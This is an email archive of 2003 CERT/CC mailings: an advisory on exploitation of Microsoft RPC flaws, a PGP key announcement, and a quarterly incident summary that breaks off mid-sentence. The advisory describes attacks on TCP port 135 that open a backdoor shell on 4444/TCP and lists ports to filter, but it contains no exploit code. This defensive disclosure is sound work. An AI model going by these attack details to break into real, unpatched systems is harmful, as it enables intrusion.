X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from lassen.berkeley.edu (lassen.berkeley.edu [128.32.25.102]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6VNQbqW209756; Thu, 31 Jul 2003 16:26:37 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost [127.0.0.1]) by lassen.berkeley.edu (8.12.9/8.12.9) with ESMTP id h6VNQaIm003425; Thu, 31 Jul 2003 16:26:36 -0700 (PDT) Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6VNQZ0J178454; Thu, 31 Jul 2003 16:26:36 -0700 (PDT) Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.27) with ESMTP id h6VNCUtB011753; Thu, 31 Jul 2003 19:24:52 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h6VL0Ghp007702; Thu, 31 Jul 2003 17:00:16 -0400 Date: Thu, 31 Jul 2003 17:00:16 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface Precedence: list Status: RO X-Status: X-Keywords: X-UID: 86 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface Original issue date: July 31, 2003 Last revised: - Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Microsoft Windows NT 4.0 * Microsoft Windows NT 4.0 Terminal Services Edition * Microsoft Windows 2000 * Microsoft Windows XP * Microsoft Windows Server 2003 Overview The CERT/CC is receiving reports of widespread scanning and exploitation of two recently discovered vulnerabilities in Microsoft Remote Procedure Call (RPC) Interface. I. Description Reports to the CERT/CC indicate that intruders are actively scanning for and exploiting a vulnerability in Microsoft's DCOM RPC interface as described in VU#568148 and CA-2003-16. Multiple exploits for this vulnerability have been publicly released, and there is active development of improved and automated exploit tools for this vulnerability. Known exploits target TCP port 135 and create a privileged backdoor command shell on successfully compromised hosts. Some versions of the exploit use TCP port 4444 for the backdoor, and other versions use a TCP port number specified by the intruder at run-time. We have also received reports of scanning activity for common backdoor ports such as 4444/TCP. In some cases, due to the RPC service terminating, a compromised system may reboot after the backdoor is accessed by an intruder. There appears to be a separate denial-of-service vulnerability in Microsoft's RPC interface that is also being targeted. Based on current information, we believe this vulnerability is separate and independent from the RPC vulnerability addressed in MS03-026. The CERT/CC is tracking this additional vulnerability as VU#326746 and is continuing to work to understand the issue and mitigation strategies. Exploit code for this vulnerability has been publicly released and also targets TCP port 135. In both of the attacks described above, a TCP session to port 135 is used to execute the attack. However, access to TCP ports 139 and 445 may also provide attack vectors and should be considered when applying mitigation strategies. II. Impact A remote attacker could exploit these vulnerabilities to execute arbitrary code with Local System privileges or to cause a denial of service condition. III. Solutions Apply patches All users are encouraged to apply the patches referred to in Microsoft Security Bulletin MS03-026 as soon as possible in order to mitigate the vulnerability described in VU#568148. These patches are also available via Microsoft's Windows Update service. Systems running Windows 2000 may still be vulnerable to at least a denial of service attack via VU#326746 if their DCOM RPC service is available via the network. Therefore, sites are encouraged to use the packet filtering tips below in addition to applying the patches supplied in MS03-026. Filter network traffic Sites are encouraged to block network access to the RPC service at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter. The specific services that should be blocked include * 135/TCP * 135/UDP * 139/TCP * 139/UDP * 445/TCP * 445/UDP If access cannot be blocked for all external hosts, the CERT/CC recommends limiting access to only those hosts that require it for normal operation. As a general rule, the CERT/CC recommends filtering all types of network traffic that are not required for normal operation. Because current exploits for VU#568148 create a backdoor, which is in some cases 4444/TCP, blocking inbound TCP sessions to ports on which no legitimate services are provided may limit intruder access to compromised hosts. Recovering from a system compromise If you believe a system under your administrative control has been compromised, please follow the steps outlined in Steps for Recovering from a UNIX or NT System Compromise Reporting The CERT/CC is tracking activity related to exploitation of the first vulnerability (VU#568148) as CERT#27479 and the second vulnerability (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent to cert@cert.org with the appropriate CERT# in the subject line. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS03-026. Appendix B. References * CERT/CC Vulnerability Note VU#561284 - http://www.kb.cert.org/vuls/id/561284 * CERT/CC Vulnerability Note VU#326746 - http://www.kb.cert.org/vuls/id/326746 * Microsoft Security Bulletin MS03-026 - http://microsoft.com/technet/security/bulletin/MS03-026.asp * Microsoft Knowledge Base article 823980 - http://support.microsoft.com?kbid=823980 ______________________________________________________________________ Authors: Chad Dougherty and Kevin Houle ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-19.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History July 31, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPyl3xGjtSoHZUTs5AQE8gAQAqCNAwHihfJzIH8DJDaWxGqacDZYAzGjh 30rPq9AM1/0KkvsdfHb6MC/b+ktCZBrMvXew1e+WGOoE0McZ+IuB9t2DIGsFCBuo ltqDw8v08FLM+7zsAM0DooEZLdNpkqdiKhKvooyJ6LGrj5Nb5inW5joITSBn9MMY YSIQfaGqABU= =m+s3 -----END PGP SIGNATURE----- From - Fri Sep 5 14:15:01 2003 X-UIDL: 6184 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165]) by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h85Ka6lo377749; Fri, 5 Sep 2003 13:36:06 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h85Ka18D032506; Fri, 5 Sep 2003 13:36:01 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h85KZt0u032318; Fri, 5 Sep 2003 13:35:55 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h85KPjFf021514; Fri, 5 Sep 2003 16:31:24 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h85JA8ip017976; Fri, 5 Sep 2003 15:10:08 -0400 Date: Fri, 5 Sep 2003 15:10:08 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: New CERT/CC PGP Key Precedence: list Status: RO X-Status: X-Keywords: X-UID: 87 -----BEGIN PGP SIGNED MESSAGE----- New CERT Coordination Center (CERT/CC) PGP Key The CERT/CC has generated a new PGP key. We use this key to sign all outgoing email, including documents sent to this list. Effective immediately, this new key is available and will be valid until Monday, November 1, 2004. To obtain further information or to download the new CERT/CC public PGP key, please visit or A copy of the new key has also been included at the bottom of this message and sent to public PGP key servers. In accordance with good key management practices, we have also generated a revocation certificate for the existing PGP key. The revocation certificate for PGP key id 0xD9513B39 has also been included below and sent to the public PGP key servers. If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org. ______________________________________________________________________ This document is available from: or ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message: subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information http://www.cert.org/legal_stuff.html Copyright 2002, 2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBP1jGmjpmH2w9K/0VAQEsaAP6A5vZh9p3OcpBSXVaFdOki/AYviHcZvmr mw5/xQ8mYsRYCrTRT9c5MVlmRSHKV2Y4AXmnjIygp9wBciBJfMy60B/NT8q3gAWc s2E+gHHvzPtU7Jd52DCJMJukKIf/ht6WnkhyRUfKIdGYUl98+N3jnjESp2qdhJWD qsqjfE9/5tM= =IW8c -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org 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 =G/b3 -----END PGP PUBLIC KEY BLOCK----- From - Mon Sep 8 16:32:31 2003 X-UIDL: 6230 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165]) by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h88KTrlo186643; Mon, 8 Sep 2003 13:29:53 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h88KTm8D022518; Mon, 8 Sep 2003 13:29:48 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h88KTi0u022387; Mon, 8 Sep 2003 13:29:44 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h88KRgFL014096; Mon, 8 Sep 2003 16:28:00 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h88Iq12Z009947; Mon, 8 Sep 2003 14:52:01 -0400 Date: Mon, 8 Sep 2003 14:52:01 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2003-03 Precedence: list Status: RO X-Status: X-Keywords: X-UID: 88 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2003-03 September 8, 2003 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in June 2003 (CS-2003-02), we have seen a large volume of reports related to a mass mailing worm, referred to as W32/Sobig.F, and have issued advisories on the exploitation of vulnerabilities in Microsoft's RPC implementation. The culmination of the RPC vulnerabilities resulted in the W32/Blaster Worm, which affected many Microsoft users. We have also reported on a vulnerability in the Cisco IOS interface as well as on multiple vulnerabilities in Microsoft Windows libraries and Internet Explorer. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. W32/Sobig.F Worm On August 18, the CERT/CC began receiving a large volume of reports of a mass mailing worm, referred to as W32/Sobig.F, spreading on the Internet. The W32/Sobig.F worm is an e-mail borne malicious program with a specially crafted attachment that has a .pif extension. The W32/Sobig.F worm requires a user to execute the attachment either manually or by using an e-mail client that will open the attachment automatically. The CERT/CC has released an Incident Note on the W32/Sobig.F worm. CERT Incident Note IN-2003-03 W32/Sobig.F Worm http://www.cert.org/incident_notes/IN-2003-03.html 2. Exploitation of Vulnerabilities in Microsoft RPC Interface In late July, the CERT/CC began receiving reports of widespread scanning and exploitation of two recently discovered vulnerabilities in Microsoft Remote Procedure Call (RPC) Interface. The CERT/CC released an advisory and a Vulnerability Note which described these vulnerabilities approximately two weeks prior to the reports of exploitation. CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface http://www.cert.org/advisories/CA-2003-19.html CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC http://www.cert.org/advisories/CA-2003-16.html Vulnerability Note VU#568148 Microsoft Windows RPC vulnerable to buffer overflow http://www.kb.cert.org/vuls/id/568148 a. W32/Blaster Worm Shortly after we released multiple documents describing Microsoft RPC vulnerabilities, we began receiving reports of widespread activity related to a new piece of malicious code known as W32/Blaster. The W32/Blaster worm exploits a vulnerability in the Microsoft DCOM RPC interface. On August 11, the CERT/CC released an advisory on W32/Blaster. We also released step-by-step recovery tips for W32/Blaster. CERT Advisory CA-2003-20 W32/Blaster Worm http://www.cert.org/advisories/CA-2003-20.html W32/Blaster Recovery tips http://www.cert.org/tech_tips/w32_blaster.html b. W32/Welchia Additionally, a worm was reported that attempted to exploit the same vulnerability as W32/Blaster. This worm, known alternately as 'W32/Welchia', 'W32/Nachi', or 'WORM_MS_BLAST.D', has been reported to kill and remove the msblast.exe artifact left behind by W32/Blaster, perform ICMP scanning to identify systems to target for exploitation, apply the patch from Microsoft (described in MS03-026), and reboot the system. The greatest impact of this worm appears to be the potential for denial-of-service conditions within an organization due to high levels of ICMP traffic. 3. Cisco IOS Interface Blocked by IPv4 Packet On July 16, the CERT/CC reported on a vulnerability in many versions of Cisco IOS that could allow an intruder to execute a denial-of-service attack against a vulnerable device. We also released a companion Vulnerability Note on the same topic. CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet http://www.cert.org/advisories/CA-2003-15.html Vulnerability Note VU#411332 Cisco IOS Interface Blocked by IPv4 Packet http://www.kb.cert.org/vuls/id/411332 Two days later we released an advisory which provided information about the availability of a public exploit for the Cisco IOS vulnerability. CERT Advisory CA-2003-17 Exploit available for the Cisco IOS Interface Blocked Vulnerabilities http://www.cert.org/advisories/CA-2003-17.html 4. Vulnerabilities in Microsoft Windows Libraries and Internet Explorer During this quarter, there were a number of vulnerabilities reported in Microsoft Windows Libraries and within Internet Explorer. Below is a summary of those vulnerabilities. a. Buffer Overflow in Microsoft Windows HTML Conversion Library A buffer overflow vulnerability exists in a shared HTML conversion library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service. On July 14, the CERT/CC issued an advisory describing this vulnerability. CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Conversion Library http://www.cert.org/advisories/CA-2003-14.html Vulnerability Note VU#823260 Microsoft Windows HTML conversion library vulnerable to buffer overflow http://www.kb.cert.org/vuls/id/823260 b. Integer Overflows in Microsoft Windows DirectX MIDI Library A set of integer overflows exists in a DirectX library included in Microsoft Windows. An attacker could exploit these vulnerabilities to execute arbitrary code or to cause a denial of service. On July 25, the CERT/CC issued an advisory describing these vulnerabilities. CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library http://www.cert.org/advisories/CA-2003-18.html Vulnerability Note VU#561284 Microsoft Windows DirectX MIDI library does not adequately validate Text or Copyright parameters in MIDI files http://www.kb.cert.org/vuls/id/561284 Vulnerability Note VU#265232 Microsoft Windows DirectX MIDI library does not adequately validate MThd track values in MIDI files 